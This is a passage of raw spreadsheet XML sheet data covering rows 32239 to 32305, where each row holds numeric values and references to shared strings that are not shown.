        <v>2312.0</v>
      </c>
      <c r="B32239" s="2">
        <v>3.2828332E7</v>
      </c>
      <c r="C32239" s="2" t="s">
        <v>31020</v>
      </c>
      <c r="D32239" s="2">
        <v>1.0</v>
      </c>
      <c r="E32239" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32239" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32240" ht="15.75" customHeight="1">
      <c r="A32240" s="1">
        <v>2513.0</v>
      </c>
      <c r="B32240" s="2">
        <v>3.3992942E7</v>
      </c>
      <c r="C32240" s="2" t="s">
        <v>31021</v>
      </c>
      <c r="D32240" s="2">
        <v>1.0</v>
      </c>
      <c r="E32240" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32240" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32241" ht="15.75" customHeight="1">
      <c r="A32241" s="1">
        <v>2557.0</v>
      </c>
      <c r="B32241" s="2">
        <v>3.4207228E7</v>
      </c>
      <c r="C32241" s="2" t="s">
        <v>31022</v>
      </c>
      <c r="D32241" s="2">
        <v>1.0</v>
      </c>
      <c r="E32241" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32241" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32242" ht="15.75" customHeight="1">
      <c r="A32242" s="1">
        <v>2673.0</v>
      </c>
      <c r="B32242" s="2">
        <v>3.4755474E7</v>
      </c>
      <c r="C32242" s="2" t="s">
        <v>31023</v>
      </c>
      <c r="D32242" s="2">
        <v>1.0</v>
      </c>
      <c r="E32242" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32242" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32243" ht="15.75" customHeight="1">
      <c r="A32243" s="1">
        <v>2675.0</v>
      </c>
      <c r="B32243" s="2">
        <v>3.4778581E7</v>
      </c>
      <c r="C32243" s="2" t="s">
        <v>31024</v>
      </c>
      <c r="D32243" s="2">
        <v>1.0</v>
      </c>
      <c r="E32243" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32243" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32244" ht="15.75" customHeight="1">
      <c r="A32244" s="1">
        <v>2883.0</v>
      </c>
      <c r="B32244" s="2">
        <v>3.5669538E7</v>
      </c>
      <c r="C32244" s="2" t="s">
        <v>31025</v>
      </c>
      <c r="D32244" s="2">
        <v>1.0</v>
      </c>
      <c r="E32244" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32244" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32245" ht="15.75" customHeight="1">
      <c r="A32245" s="1">
        <v>3362.0</v>
      </c>
      <c r="B32245" s="2">
        <v>3.7883865E7</v>
      </c>
      <c r="C32245" s="2" t="s">
        <v>31026</v>
      </c>
      <c r="D32245" s="2">
        <v>1.0</v>
      </c>
      <c r="E32245" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32245" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32246" ht="15.75" customHeight="1">
      <c r="A32246" s="1">
        <v>3407.0</v>
      </c>
      <c r="B32246" s="2">
        <v>3.8042875E7</v>
      </c>
      <c r="C32246" s="2" t="s">
        <v>31027</v>
      </c>
      <c r="D32246" s="2">
        <v>1.0</v>
      </c>
      <c r="E32246" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32246" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32247" ht="15.75" customHeight="1">
      <c r="A32247" s="1">
        <v>3487.0</v>
      </c>
      <c r="B32247" s="2">
        <v>3.8420791E7</v>
      </c>
      <c r="C32247" s="2" t="s">
        <v>31028</v>
      </c>
      <c r="D32247" s="2">
        <v>1.0</v>
      </c>
      <c r="E32247" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32247" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32248" ht="15.75" customHeight="1">
      <c r="A32248" s="1">
        <v>3499.0</v>
      </c>
      <c r="B32248" s="2">
        <v>3.8490477E7</v>
      </c>
      <c r="C32248" s="2" t="s">
        <v>31029</v>
      </c>
      <c r="D32248" s="2">
        <v>1.0</v>
      </c>
      <c r="E32248" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32248" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32249" ht="15.75" customHeight="1">
      <c r="A32249" s="1">
        <v>3501.0</v>
      </c>
      <c r="B32249" s="2">
        <v>3.8521482E7</v>
      </c>
      <c r="C32249" s="2" t="s">
        <v>31030</v>
      </c>
      <c r="D32249" s="2">
        <v>1.0</v>
      </c>
      <c r="E32249" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32249" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32250" ht="15.75" customHeight="1">
      <c r="A32250" s="1">
        <v>3599.0</v>
      </c>
      <c r="B32250" s="2">
        <v>3.9079573E7</v>
      </c>
      <c r="C32250" s="2" t="s">
        <v>31031</v>
      </c>
      <c r="D32250" s="2">
        <v>1.0</v>
      </c>
      <c r="E32250" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32250" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32251" ht="15.75" customHeight="1">
      <c r="A32251" s="1">
        <v>3662.0</v>
      </c>
      <c r="B32251" s="2">
        <v>3.936418E7</v>
      </c>
      <c r="C32251" s="2" t="s">
        <v>31032</v>
      </c>
      <c r="D32251" s="2">
        <v>1.0</v>
      </c>
      <c r="E32251" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32251" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32252" ht="15.75" customHeight="1">
      <c r="A32252" s="1">
        <v>3677.0</v>
      </c>
      <c r="B32252" s="2">
        <v>3.9456235E7</v>
      </c>
      <c r="C32252" s="2" t="s">
        <v>31033</v>
      </c>
      <c r="D32252" s="2">
        <v>1.0</v>
      </c>
      <c r="E32252" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32252" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32253" ht="15.75" customHeight="1">
      <c r="A32253" s="1">
        <v>3815.0</v>
      </c>
      <c r="B32253" s="2">
        <v>4.0082837E7</v>
      </c>
      <c r="C32253" s="2" t="s">
        <v>31034</v>
      </c>
      <c r="D32253" s="2">
        <v>1.0</v>
      </c>
      <c r="E32253" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32253" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32254" ht="15.75" customHeight="1">
      <c r="A32254" s="1">
        <v>3939.0</v>
      </c>
      <c r="B32254" s="2">
        <v>4.0601185E7</v>
      </c>
      <c r="C32254" s="2" t="s">
        <v>31035</v>
      </c>
      <c r="D32254" s="2">
        <v>1.0</v>
      </c>
      <c r="E32254" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32254" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32255" ht="15.75" customHeight="1">
      <c r="A32255" s="1">
        <v>4115.0</v>
      </c>
      <c r="B32255" s="2">
        <v>4.1353092E7</v>
      </c>
      <c r="C32255" s="2" t="s">
        <v>31036</v>
      </c>
      <c r="D32255" s="2">
        <v>1.0</v>
      </c>
      <c r="E32255" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32255" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32256" ht="15.75" customHeight="1">
      <c r="A32256" s="1">
        <v>4318.0</v>
      </c>
      <c r="B32256" s="2">
        <v>4.20036E7</v>
      </c>
      <c r="C32256" s="2" t="s">
        <v>31037</v>
      </c>
      <c r="D32256" s="2">
        <v>1.0</v>
      </c>
      <c r="E32256" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32256" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32257" ht="15.75" customHeight="1">
      <c r="A32257" s="1">
        <v>4544.0</v>
      </c>
      <c r="B32257" s="2">
        <v>4.2662919E7</v>
      </c>
      <c r="C32257" s="2" t="s">
        <v>31038</v>
      </c>
      <c r="D32257" s="2">
        <v>1.0</v>
      </c>
      <c r="E32257" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32257" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32258" ht="15.75" customHeight="1">
      <c r="A32258" s="1">
        <v>4653.0</v>
      </c>
      <c r="B32258" s="2">
        <v>4.3105247E7</v>
      </c>
      <c r="C32258" s="2" t="s">
        <v>31039</v>
      </c>
      <c r="D32258" s="2">
        <v>1.0</v>
      </c>
      <c r="E32258" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32258" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32259" ht="15.75" customHeight="1">
      <c r="A32259" s="1">
        <v>4674.0</v>
      </c>
      <c r="B32259" s="2">
        <v>4.3150482E7</v>
      </c>
      <c r="C32259" s="2" t="s">
        <v>31040</v>
      </c>
      <c r="D32259" s="2">
        <v>1.0</v>
      </c>
      <c r="E32259" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32259" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32260" ht="15.75" customHeight="1">
      <c r="A32260" s="1">
        <v>4721.0</v>
      </c>
      <c r="B32260" s="2">
        <v>4.3316426E7</v>
      </c>
      <c r="C32260" s="2" t="s">
        <v>31041</v>
      </c>
      <c r="D32260" s="2">
        <v>1.0</v>
      </c>
      <c r="E32260" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32260" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32261" ht="15.75" customHeight="1">
      <c r="A32261" s="1">
        <v>4880.0</v>
      </c>
      <c r="B32261" s="2">
        <v>4.3851774E7</v>
      </c>
      <c r="C32261" s="2" t="s">
        <v>31042</v>
      </c>
      <c r="D32261" s="2">
        <v>1.0</v>
      </c>
      <c r="E32261" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32261" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32262" ht="15.75" customHeight="1">
      <c r="A32262" s="1">
        <v>4895.0</v>
      </c>
      <c r="B32262" s="2">
        <v>4.3876717E7</v>
      </c>
      <c r="C32262" s="2" t="s">
        <v>31043</v>
      </c>
      <c r="D32262" s="2">
        <v>1.0</v>
      </c>
      <c r="E32262" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32262" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32263" ht="15.75" customHeight="1">
      <c r="A32263" s="1">
        <v>4992.0</v>
      </c>
      <c r="B32263" s="2">
        <v>4.4146274E7</v>
      </c>
      <c r="C32263" s="2" t="s">
        <v>31044</v>
      </c>
      <c r="D32263" s="2">
        <v>1.0</v>
      </c>
      <c r="E32263" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32263" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32264" ht="15.75" customHeight="1">
      <c r="A32264" s="1">
        <v>4994.0</v>
      </c>
      <c r="B32264" s="2">
        <v>4.4167197E7</v>
      </c>
      <c r="C32264" s="2" t="s">
        <v>31045</v>
      </c>
      <c r="D32264" s="2">
        <v>1.0</v>
      </c>
      <c r="E32264" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32264" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32265" ht="15.75" customHeight="1">
      <c r="A32265" s="1">
        <v>5303.0</v>
      </c>
      <c r="B32265" s="2">
        <v>4.5255097E7</v>
      </c>
      <c r="C32265" s="2" t="s">
        <v>31046</v>
      </c>
      <c r="D32265" s="2">
        <v>1.0</v>
      </c>
      <c r="E32265" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32265" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32266" ht="15.75" customHeight="1">
      <c r="A32266" s="1">
        <v>5330.0</v>
      </c>
      <c r="B32266" s="2">
        <v>4.5313623E7</v>
      </c>
      <c r="C32266" s="2" t="s">
        <v>31047</v>
      </c>
      <c r="D32266" s="2">
        <v>1.0</v>
      </c>
      <c r="E32266" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32266" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32267" ht="15.75" customHeight="1">
      <c r="A32267" s="1">
        <v>5344.0</v>
      </c>
      <c r="B32267" s="2">
        <v>4.5330182E7</v>
      </c>
      <c r="C32267" s="2" t="s">
        <v>31048</v>
      </c>
      <c r="D32267" s="2">
        <v>1.0</v>
      </c>
      <c r="E32267" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32267" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32268" ht="15.75" customHeight="1">
      <c r="A32268" s="1">
        <v>5438.0</v>
      </c>
      <c r="B32268" s="2">
        <v>4.5601831E7</v>
      </c>
      <c r="C32268" s="2" t="s">
        <v>31049</v>
      </c>
      <c r="D32268" s="2">
        <v>1.0</v>
      </c>
      <c r="E32268" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32268" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32269" ht="15.75" customHeight="1">
      <c r="A32269" s="1">
        <v>5503.0</v>
      </c>
      <c r="B32269" s="2">
        <v>4.581684E7</v>
      </c>
      <c r="C32269" s="2" t="s">
        <v>31050</v>
      </c>
      <c r="D32269" s="2">
        <v>1.0</v>
      </c>
      <c r="E32269" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32269" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32270" ht="15.75" customHeight="1">
      <c r="A32270" s="1">
        <v>5727.0</v>
      </c>
      <c r="B32270" s="2">
        <v>4.6603494E7</v>
      </c>
      <c r="C32270" s="2" t="s">
        <v>31051</v>
      </c>
      <c r="D32270" s="2">
        <v>1.0</v>
      </c>
      <c r="E32270" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32270" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32271" ht="15.75" customHeight="1">
      <c r="A32271" s="1">
        <v>6081.0</v>
      </c>
      <c r="B32271" s="2">
        <v>4.7675786E7</v>
      </c>
      <c r="C32271" s="2" t="s">
        <v>31052</v>
      </c>
      <c r="D32271" s="2">
        <v>1.0</v>
      </c>
      <c r="E32271" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32271" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32272" ht="15.75" customHeight="1">
      <c r="A32272" s="1">
        <v>6165.0</v>
      </c>
      <c r="B32272" s="2">
        <v>4.7876451E7</v>
      </c>
      <c r="C32272" s="2" t="s">
        <v>31053</v>
      </c>
      <c r="D32272" s="2">
        <v>1.0</v>
      </c>
      <c r="E32272" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32272" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32273" ht="15.75" customHeight="1">
      <c r="A32273" s="1">
        <v>6524.0</v>
      </c>
      <c r="B32273" s="2">
        <v>4.8805683E7</v>
      </c>
      <c r="C32273" s="2" t="s">
        <v>31054</v>
      </c>
      <c r="D32273" s="2">
        <v>1.0</v>
      </c>
      <c r="E32273" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32273" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32274" ht="15.75" customHeight="1">
      <c r="A32274" s="1">
        <v>6667.0</v>
      </c>
      <c r="B32274" s="2">
        <v>4.9113253E7</v>
      </c>
      <c r="C32274" s="2" t="s">
        <v>31055</v>
      </c>
      <c r="D32274" s="2">
        <v>1.0</v>
      </c>
      <c r="E32274" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32274" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32275" ht="15.75" customHeight="1">
      <c r="A32275" s="1">
        <v>6719.0</v>
      </c>
      <c r="B32275" s="2">
        <v>4.9280665E7</v>
      </c>
      <c r="C32275" s="2" t="s">
        <v>31056</v>
      </c>
      <c r="D32275" s="2">
        <v>1.0</v>
      </c>
      <c r="E32275" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32275" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32276" ht="15.75" customHeight="1">
      <c r="A32276" s="1">
        <v>6746.0</v>
      </c>
      <c r="B32276" s="2">
        <v>4.9377287E7</v>
      </c>
      <c r="C32276" s="2" t="s">
        <v>31057</v>
      </c>
      <c r="D32276" s="2">
        <v>1.0</v>
      </c>
      <c r="E32276" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32276" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32277" ht="15.75" customHeight="1">
      <c r="A32277" s="1">
        <v>6833.0</v>
      </c>
      <c r="B32277" s="2">
        <v>4.9596959E7</v>
      </c>
      <c r="C32277" s="2" t="s">
        <v>31058</v>
      </c>
      <c r="D32277" s="2">
        <v>1.0</v>
      </c>
      <c r="E32277" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32277" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32278" ht="15.75" customHeight="1">
      <c r="A32278" s="1">
        <v>6848.0</v>
      </c>
      <c r="B32278" s="2">
        <v>4.9641412E7</v>
      </c>
      <c r="C32278" s="2" t="s">
        <v>31059</v>
      </c>
      <c r="D32278" s="2">
        <v>1.0</v>
      </c>
      <c r="E32278" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32278" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32279" ht="15.75" customHeight="1">
      <c r="A32279" s="1">
        <v>6884.0</v>
      </c>
      <c r="B32279" s="2">
        <v>4.9744557E7</v>
      </c>
      <c r="C32279" s="2" t="s">
        <v>31060</v>
      </c>
      <c r="D32279" s="2">
        <v>1.0</v>
      </c>
      <c r="E32279" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32279" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32280" ht="15.75" customHeight="1">
      <c r="A32280" s="1">
        <v>6918.0</v>
      </c>
      <c r="B32280" s="2">
        <v>4.9866779E7</v>
      </c>
      <c r="C32280" s="2" t="s">
        <v>31061</v>
      </c>
      <c r="D32280" s="2">
        <v>1.0</v>
      </c>
      <c r="E32280" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32280" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32281" ht="15.75" customHeight="1">
      <c r="A32281" s="1">
        <v>7021.0</v>
      </c>
      <c r="B32281" s="2">
        <v>5.009793E7</v>
      </c>
      <c r="C32281" s="2" t="s">
        <v>31062</v>
      </c>
      <c r="D32281" s="2">
        <v>1.0</v>
      </c>
      <c r="E32281" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32281" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32282" ht="15.75" customHeight="1">
      <c r="A32282" s="1">
        <v>7026.0</v>
      </c>
      <c r="B32282" s="2">
        <v>5.0112416E7</v>
      </c>
      <c r="C32282" s="2" t="s">
        <v>31063</v>
      </c>
      <c r="D32282" s="2">
        <v>1.0</v>
      </c>
      <c r="E32282" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32282" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32283" ht="15.75" customHeight="1">
      <c r="A32283" s="1">
        <v>7089.0</v>
      </c>
      <c r="B32283" s="2">
        <v>5.0290737E7</v>
      </c>
      <c r="C32283" s="2" t="s">
        <v>31064</v>
      </c>
      <c r="D32283" s="2">
        <v>1.0</v>
      </c>
      <c r="E32283" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32283" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32284" ht="15.75" customHeight="1">
      <c r="A32284" s="1">
        <v>7139.0</v>
      </c>
      <c r="B32284" s="2">
        <v>5.0443037E7</v>
      </c>
      <c r="C32284" s="2" t="s">
        <v>31065</v>
      </c>
      <c r="D32284" s="2">
        <v>1.0</v>
      </c>
      <c r="E32284" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32284" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32285" ht="15.75" customHeight="1">
      <c r="A32285" s="1">
        <v>7158.0</v>
      </c>
      <c r="B32285" s="2">
        <v>5.0489448E7</v>
      </c>
      <c r="C32285" s="2" t="s">
        <v>31066</v>
      </c>
      <c r="D32285" s="2">
        <v>1.0</v>
      </c>
      <c r="E32285" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32285" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32286" ht="15.75" customHeight="1">
      <c r="A32286" s="1">
        <v>7183.0</v>
      </c>
      <c r="B32286" s="2">
        <v>5.0564107E7</v>
      </c>
      <c r="C32286" s="2" t="s">
        <v>31067</v>
      </c>
      <c r="D32286" s="2">
        <v>1.0</v>
      </c>
      <c r="E32286" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32286" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32287" ht="15.75" customHeight="1">
      <c r="A32287" s="1">
        <v>7311.0</v>
      </c>
      <c r="B32287" s="2">
        <v>5.0860751E7</v>
      </c>
      <c r="C32287" s="2" t="s">
        <v>31068</v>
      </c>
      <c r="D32287" s="2">
        <v>1.0</v>
      </c>
      <c r="E32287" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32287" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32288" ht="15.75" customHeight="1">
      <c r="A32288" s="1">
        <v>7352.0</v>
      </c>
      <c r="B32288" s="2">
        <v>5.0986361E7</v>
      </c>
      <c r="C32288" s="2" t="s">
        <v>31069</v>
      </c>
      <c r="D32288" s="2">
        <v>1.0</v>
      </c>
      <c r="E32288" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32288" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32289" ht="15.75" customHeight="1">
      <c r="A32289" s="1">
        <v>7370.0</v>
      </c>
      <c r="B32289" s="2">
        <v>5.1040297E7</v>
      </c>
      <c r="C32289" s="2" t="s">
        <v>31070</v>
      </c>
      <c r="D32289" s="2">
        <v>1.0</v>
      </c>
      <c r="E32289" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32289" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32290" ht="15.75" customHeight="1">
      <c r="A32290" s="1">
        <v>7376.0</v>
      </c>
      <c r="B32290" s="2">
        <v>5.1045354E7</v>
      </c>
      <c r="C32290" s="2" t="s">
        <v>31071</v>
      </c>
      <c r="D32290" s="2">
        <v>1.0</v>
      </c>
      <c r="E32290" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32290" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32291" ht="15.75" customHeight="1">
      <c r="A32291" s="1">
        <v>7499.0</v>
      </c>
      <c r="B32291" s="2">
        <v>5.1382338E7</v>
      </c>
      <c r="C32291" s="2" t="s">
        <v>31072</v>
      </c>
      <c r="D32291" s="2">
        <v>1.0</v>
      </c>
      <c r="E32291" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32291" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32292" ht="15.75" customHeight="1">
      <c r="A32292" s="1">
        <v>7602.0</v>
      </c>
      <c r="B32292" s="2">
        <v>5.1642973E7</v>
      </c>
      <c r="C32292" s="2" t="s">
        <v>31073</v>
      </c>
      <c r="D32292" s="2">
        <v>1.0</v>
      </c>
      <c r="E32292" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32292" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32293" ht="15.75" customHeight="1">
      <c r="A32293" s="1">
        <v>7634.0</v>
      </c>
      <c r="B32293" s="2">
        <v>5.176869E7</v>
      </c>
      <c r="C32293" s="2" t="s">
        <v>31074</v>
      </c>
      <c r="D32293" s="2">
        <v>1.0</v>
      </c>
      <c r="E32293" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32293" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32294" ht="15.75" customHeight="1">
      <c r="A32294" s="1">
        <v>7670.0</v>
      </c>
      <c r="B32294" s="2">
        <v>5.189225E7</v>
      </c>
      <c r="C32294" s="2" t="s">
        <v>31075</v>
      </c>
      <c r="D32294" s="2">
        <v>1.0</v>
      </c>
      <c r="E32294" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32294" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32295" ht="15.75" customHeight="1">
      <c r="A32295" s="1">
        <v>7786.0</v>
      </c>
      <c r="B32295" s="2">
        <v>5.2191357E7</v>
      </c>
      <c r="C32295" s="2" t="s">
        <v>31076</v>
      </c>
      <c r="D32295" s="2">
        <v>1.0</v>
      </c>
      <c r="E32295" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32295" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32296" ht="15.75" customHeight="1">
      <c r="A32296" s="1">
        <v>7842.0</v>
      </c>
      <c r="B32296" s="2">
        <v>5.23269E7</v>
      </c>
      <c r="C32296" s="2" t="s">
        <v>31077</v>
      </c>
      <c r="D32296" s="2">
        <v>1.0</v>
      </c>
      <c r="E32296" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32296" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32297" ht="15.75" customHeight="1">
      <c r="A32297" s="1">
        <v>7856.0</v>
      </c>
      <c r="B32297" s="2">
        <v>5.2361539E7</v>
      </c>
      <c r="C32297" s="2" t="s">
        <v>31078</v>
      </c>
      <c r="D32297" s="2">
        <v>1.0</v>
      </c>
      <c r="E32297" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32297" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32298" ht="15.75" customHeight="1">
      <c r="A32298" s="1">
        <v>8027.0</v>
      </c>
      <c r="B32298" s="2">
        <v>5.2813148E7</v>
      </c>
      <c r="C32298" s="2" t="s">
        <v>31079</v>
      </c>
      <c r="D32298" s="2">
        <v>1.0</v>
      </c>
      <c r="E32298" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32298" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32299" ht="15.75" customHeight="1">
      <c r="A32299" s="1">
        <v>8032.0</v>
      </c>
      <c r="B32299" s="2">
        <v>5.2827628E7</v>
      </c>
      <c r="C32299" s="2" t="s">
        <v>31080</v>
      </c>
      <c r="D32299" s="2">
        <v>1.0</v>
      </c>
      <c r="E32299" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32299" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32300" ht="15.75" customHeight="1">
      <c r="A32300" s="1">
        <v>8121.0</v>
      </c>
      <c r="B32300" s="2">
        <v>5.3080065E7</v>
      </c>
      <c r="C32300" s="2" t="s">
        <v>31081</v>
      </c>
      <c r="D32300" s="2">
        <v>1.0</v>
      </c>
      <c r="E32300" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32300" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32301" ht="15.75" customHeight="1">
      <c r="A32301" s="1">
        <v>8167.0</v>
      </c>
      <c r="B32301" s="2">
        <v>5.3213626E7</v>
      </c>
      <c r="C32301" s="2" t="s">
        <v>31082</v>
      </c>
      <c r="D32301" s="2">
        <v>1.0</v>
      </c>
      <c r="E32301" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32301" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32302" ht="15.75" customHeight="1">
      <c r="A32302" s="1">
        <v>8285.0</v>
      </c>
      <c r="B32302" s="2">
        <v>5.3508935E7</v>
      </c>
      <c r="C32302" s="2" t="s">
        <v>31083</v>
      </c>
      <c r="D32302" s="2">
        <v>1.0</v>
      </c>
      <c r="E32302" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32302" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32303" ht="15.75" customHeight="1">
      <c r="A32303" s="1">
        <v>8318.0</v>
      </c>
      <c r="B32303" s="2">
        <v>5.3629104E7</v>
      </c>
      <c r="C32303" s="2" t="s">
        <v>31084</v>
      </c>
      <c r="D32303" s="2">
        <v>1.0</v>
      </c>
      <c r="E32303" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32303" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32304" ht="15.75" customHeight="1">
      <c r="A32304" s="1">
        <v>8378.0</v>
      </c>
      <c r="B32304" s="2">
        <v>5.3813603E7</v>
      </c>
      <c r="C32304" s="2" t="s">
        <v>31085</v>
      </c>
      <c r="D32304" s="2">
        <v>1.0</v>
      </c>
      <c r="E32304" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32304" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32305" ht="15.75" customHeight="1">
      <c r="A32305" s="1">
        <v>8494.0</v>
      </c>
      <c r="B32305" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C32305" s="2" t="s">
        <v>31086</v>
      </c>
      <c r="D32305" s="2">
        <v>1.0</v>
      </c>
      <c r="E32305" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32305" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32306" ht="15.75" customHeight="1">
      <c r="A32306" s="1">
